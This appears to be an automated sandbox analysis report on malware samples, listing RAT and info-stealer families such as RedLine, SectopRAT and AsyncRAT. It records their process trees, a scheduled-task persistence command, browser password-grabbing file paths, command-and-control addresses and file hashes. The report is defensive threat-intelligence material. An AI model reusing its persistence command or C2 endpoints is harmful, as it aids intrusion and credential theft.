Analysis Overview
SHA256
4a8e933462209a204f87c02e41e88e99541ccb85964a22d9762f443cf19af409
Threat Level: Known bad
The file 4a8e933462209a204f87c02e41e88e99541ccb85964a22d9762f443cf19af409 was found to be: Known bad.
Malicious Activity Summary
Async RAT payload
Windows security bypass
njRAT/Bladabindi
Modifies visiblity of hidden/system files in Explorer
SectopRAT
RedLine
Asyncrat family
Glupteba payload
Njrat family
Glupteba family
Glupteba
SectopRAT payload
Redline family
MetaSploit
AsyncRat
Metasploit family
Sectoprat family
RedLine payload
Modifies boot configuration data using bcdedit
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
Drops file in Drivers directory
Possible attempt to disable PatchGuard
Windows security modification
Reads user/profile data of web browsers
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Checks installed software on the system
Looks up external IP address via web service
Manipulates WinMon driver.
Manipulates WinMonFS driver.
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Browser Information Discovery
Program crash
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
Modifies system certificate store
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
GoLang User-Agent
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Modifies data under HKEY_USERS
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-08 02:11
Signatures
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Asyncrat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1214e5f9dec9e4c94ccf93c4495788c8314f396ce74dbb5c15cd372411ceed98.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1214e5f9dec9e4c94ccf93c4495788c8314f396ce74dbb5c15cd372411ceed98.exe
"C:\Users\Admin\AppData\Local\Temp\1214e5f9dec9e4c94ccf93c4495788c8314f396ce74dbb5c15cd372411ceed98.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
Files
memory/1252-0-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp
memory/1252-1-0x0000000000AC0000-0x0000000000BCA000-memory.dmp
memory/1252-2-0x0000000000A20000-0x0000000000A96000-memory.dmp
memory/1252-3-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp
memory/1252-4-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
151s
Command Line
Signatures
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Browser Information Discovery
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1214e5f9dec9e4c94ccf93c4495788c8314f396ce74dbb5c15cd372411ceed98.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1214e5f9dec9e4c94ccf93c4495788c8314f396ce74dbb5c15cd372411ceed98.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1214e5f9dec9e4c94ccf93c4495788c8314f396ce74dbb5c15cd372411ceed98.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1214e5f9dec9e4c94ccf93c4495788c8314f396ce74dbb5c15cd372411ceed98.exe
"C:\Users\Admin\AppData\Local\Temp\1214e5f9dec9e4c94ccf93c4495788c8314f396ce74dbb5c15cd372411ceed98.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | f0558828.xsph.ru | udp |
| RU | 141.8.197.42:80 | f0558828.xsph.ru | tcp |
| US | 8.8.8.8:53 | 42.197.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/5076-0-0x00007FFE43933000-0x00007FFE43935000-memory.dmp
memory/5076-1-0x000001D28D240000-0x000001D28D34A000-memory.dmp
memory/5076-2-0x000001D2A7940000-0x000001D2A79B6000-memory.dmp
memory/5076-3-0x00007FFE43930000-0x00007FFE443F1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\NuyTVLTXyuBuDHw24025E5463\6324025E54NuyTVLTXyuBuDHw\Browsers\Passwords\Passwords_Edge.txt
| MD5 | 42fa959509b3ed7c94c0cf3728b03f6d |
| SHA1 | 661292176640beb0b38dc9e7a462518eb592d27d |
| SHA256 | 870ef3d2370932a8938faa60abd47d75ea0af98bfa11c82ae8efe9e94fd8be00 |
| SHA512 | 7def291737d081c93d0cc38ac8d3062fd34d93b68d191eb0d54e9857e0c0afdbcd241471a2e10c28ce8db3b1d1ae0dba2ef6f609cfe8a1e8fe1dd103dba80007 |
C:\Users\Admin\AppData\Local\Temp\NuyTVLTXyuBuDHw24025E5463\6324025E54NuyTVLTXyuBuDHw\Grabber\ClearSelect.doc
| MD5 | 40d69c957ac1a39d697285726133b9d7 |
| SHA1 | de9dcbba75f3a09d632a43013d705fd96adc0354 |
| SHA256 | f425a97a532364395c9b55a9c6acdcad9c84390b29b45605a0175c9c8f44b39d |
| SHA512 | 863b01fa2f3828621e6f4e33acafacca3288f697a51b39567ab24dd1db0fc00c59b73f33d88ae6115af0f1f49382e3e659e645ac2d10f1f5c5931a155a4755c1 |
C:\Users\Admin\AppData\Local\Temp\NuyTVLTXyuBuDHw24025E5463\6324025E54NuyTVLTXyuBuDHw\Grabber\JoinDebug.doc
| MD5 | d485ec09130be18c11c18b7ad6a2264b |
| SHA1 | aab65ad9bdb8e568c7e8340cc1c7af48365bf63b |
| SHA256 | 71d3d648c7093324093e51b5ced12b91c22d5a9f6a1af896d8857e8e32b59a64 |
| SHA512 | 102e52c7713181be1eaf0382491f29cc9ac4ecf830e27658a912b1fb198d3b267c51debc2191dc0cf90f0d450c95c48641e61cb82c6f1e70e2773ddafa88307c |
memory/5076-83-0x00007FFE43930000-0x00007FFE443F1000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win7-20240903-en
Max time kernel
138s
Max time network
146s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2520 set thread context of 2764 | N/A | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe
"C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dktqSaBDU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1AC1.tmp"
C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe
"{path}"
Network
| Country | Destination | Domain | Proto |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp | |
| FR | 152.228.150.198:11188 | tcp |
Files
memory/2520-0-0x0000000074CAE000-0x0000000074CAF000-memory.dmp
memory/2520-1-0x00000000000C0000-0x000000000012C000-memory.dmp
memory/2520-2-0x0000000074CA0000-0x000000007538E000-memory.dmp
memory/2520-3-0x0000000000520000-0x0000000000528000-memory.dmp
memory/2520-4-0x0000000074CA0000-0x000000007538E000-memory.dmp
memory/2520-5-0x0000000004EC0000-0x0000000004F38000-memory.dmp
memory/2520-6-0x0000000000680000-0x00000000006AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp1AC1.tmp
| MD5 | 8d1b43491346cb2998697c21872bf201 |
| SHA1 | 523d971be9c09e24857cf7e4f4474c4334d51197 |
| SHA256 | 833d1c00c94f159b5ba24db5273b431f9373448783e77c710b8fc7f962baa620 |
| SHA512 | ed91f913d3b1621353cfb136c9091d55761fc45a36282131d743867760e3ec9a6c49999d3528280f5e35712619d0567d1fb47d389849de9d1496a147e62737b2 |
memory/2764-12-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2764-14-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2764-23-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2764-20-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2764-18-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2764-16-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2764-15-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2764-10-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2764-24-0x0000000074CA0000-0x000000007538E000-memory.dmp
memory/2520-25-0x0000000074CA0000-0x000000007538E000-memory.dmp
memory/2764-26-0x0000000074CA0000-0x000000007538E000-memory.dmp
memory/2764-27-0x0000000074CA0000-0x000000007538E000-memory.dmp
memory/2764-28-0x0000000074CA0000-0x000000007538E000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win7-20240903-en
Max time kernel
144s
Max time network
148s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1836 set thread context of 2460 | N/A | C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe | C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe
"C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe"
C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe
C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe
C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe
C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe
Network
| Country | Destination | Domain | Proto |
| NL | 185.203.243.131:27365 | tcp | |
| NL | 185.203.243.131:27365 | tcp | |
| NL | 185.203.243.131:27365 | tcp | |
| NL | 185.203.243.131:27365 | tcp | |
| NL | 185.203.243.131:27365 | tcp | |
| NL | 185.203.243.131:27365 | tcp | |
| NL | 185.203.243.131:27365 | tcp |
Files
memory/1836-0-0x000000007410E000-0x000000007410F000-memory.dmp
memory/1836-1-0x0000000000080000-0x00000000000E0000-memory.dmp
memory/1836-2-0x0000000074100000-0x00000000747EE000-memory.dmp
memory/2460-3-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2460-5-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2460-15-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1836-14-0x0000000074100000-0x00000000747EE000-memory.dmp
memory/2460-11-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2460-9-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2460-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2460-6-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2460-4-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2460-16-0x0000000074100000-0x00000000747EE000-memory.dmp
memory/2460-17-0x0000000074100000-0x00000000747EE000-memory.dmp
memory/2460-18-0x0000000074100000-0x00000000747EE000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
153s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\236020bb910e3cfd1e03bff5722204be40c0739fb6d2954b35c8b02185e37ef6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\output.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\output.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\KptpDogTJSrhyBmYndFbaBLc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\output.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\KptpDogTJSrhyBmYndFbaBLc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\236020bb910e3cfd1e03bff5722204be40c0739fb6d2954b35c8b02185e37ef6.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\KptpDogTJSrhyBmYndFbaBLc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\236020bb910e3cfd1e03bff5722204be40c0739fb6d2954b35c8b02185e37ef6.exe
"C:\Users\Admin\AppData\Local\Temp\236020bb910e3cfd1e03bff5722204be40c0739fb6d2954b35c8b02185e37ef6.exe"
C:\Users\Admin\AppData\Roaming\output.exe
"C:\Users\Admin\AppData\Roaming\output.exe"
C:\Users\Admin\AppData\Local\Temp\KptpDogTJSrhyBmYndFbaBLc.exe
"C:\Users\Admin\AppData\Local\Temp\KptpDogTJSrhyBmYndFbaBLc.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| NL | 45.81.227.32:22625 | tcp | |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\output.exe
| MD5 | 2f376ad2903620fd9f52c4d8af903777 |
| SHA1 | 726ecc2dff7d3af1b4d03591761183f70c9a1242 |
| SHA256 | e60ab1c5095002e6ed227251cfc4c4124db13255af95b6b76405e44e7a750215 |
| SHA512 | 75fbb18d81c022bef30887718da799ffd77c462ef324b9975bd3815b7af5b759e70858a9e0f472b9bedd0af3c90a05df02fd3f6c492fea802e12c719ad2dd0eb |
memory/2336-9-0x0000000073E4E000-0x0000000073E4F000-memory.dmp
memory/2336-10-0x0000000000320000-0x0000000000368000-memory.dmp
memory/2336-11-0x0000000073E40000-0x00000000745F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\KptpDogTJSrhyBmYndFbaBLc.exe
| MD5 | f4bbbbd0c06b5b5f46386ad1db6227b0 |
| SHA1 | 5a026b7ed8c49b1213a6393e938c91399ff33eb8 |
| SHA256 | 3783dda749b402ddb2065d6830dc3d7d2771b4b8dc02358efe64947205b2517d |
| SHA512 | 3a7554883cf3c729a1f249eff33e3ad5de69be174971209e536d7d2c829d50bc9666391e9663db782eb445f8e8f87c81ac7b0248faff2f2e594909bbd84f5d48 |
memory/628-24-0x00000000003C0000-0x00000000003DE000-memory.dmp
memory/2336-25-0x0000000073E40000-0x00000000745F0000-memory.dmp
memory/628-26-0x0000000073E40000-0x00000000745F0000-memory.dmp
memory/628-27-0x00000000052A0000-0x0000000005844000-memory.dmp
memory/628-28-0x0000000005E70000-0x0000000006488000-memory.dmp
memory/628-30-0x0000000004DF0000-0x0000000004E02000-memory.dmp
memory/628-29-0x0000000004E50000-0x0000000004EE2000-memory.dmp
memory/628-31-0x0000000004F30000-0x0000000004F6C000-memory.dmp
memory/628-32-0x0000000005BE0000-0x0000000005C2C000-memory.dmp
memory/628-33-0x0000000073E40000-0x00000000745F0000-memory.dmp
memory/628-34-0x00000000076F0000-0x00000000077FA000-memory.dmp
memory/628-35-0x0000000073E40000-0x00000000745F0000-memory.dmp
memory/628-36-0x0000000073E40000-0x00000000745F0000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3348 set thread context of 2296 | N/A | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe
"C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dktqSaBDU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2565.tmp"
C:\Users\Admin\AppData\Local\Temp\25dc70a3def65cca61f30ad3a818edbf0dcebbf8257a302212fd7424cc7e8560.exe
"{path}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
